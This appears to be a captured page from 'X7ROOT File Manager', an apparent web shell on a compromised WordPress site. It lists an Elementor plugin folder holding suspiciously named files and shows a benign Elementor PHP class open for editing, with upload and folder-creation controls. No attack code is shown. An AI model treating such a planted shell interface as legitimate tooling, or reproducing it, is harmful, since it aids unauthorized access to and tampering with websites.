X7ROOT File Manager
Current Path:
/home/hikrsdyp/public_html/wp-content/plugins/elementor/core/utils/api
home
/
hikrsdyp
/
public_html
/
wp-content
/
plugins
/
elementor
/
core
/
utils
/
api
/
??
..
??
error-builder.php
(840 B)
??
error_log
(254 B)
??
modtemplates.inc
(2.87 MB)
??
n47oju3s
(9.03 KB)
??
parse-errors.php
(1023 B)
??
parse-result.php
(612 B)
??
response-builder.php
(855 B)
??
z21lcfyc
(9.03 KB)
Editing: parse-result.php
<?php namespace Elementor\Core\Utils\Api; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Parse_Result { private Parse_Errors $errors; private $value; public static function make() { return new static(); } public function __construct() { $this->errors = Parse_Errors::make(); } public function wrap( $value ): self { $this->value = $value; return $this; } public function unwrap() { return $this->value; } public function is_valid(): bool { return $this->errors->is_empty(); } public function errors(): Parse_Errors { return $this->errors; } }
Upload File
Create Folder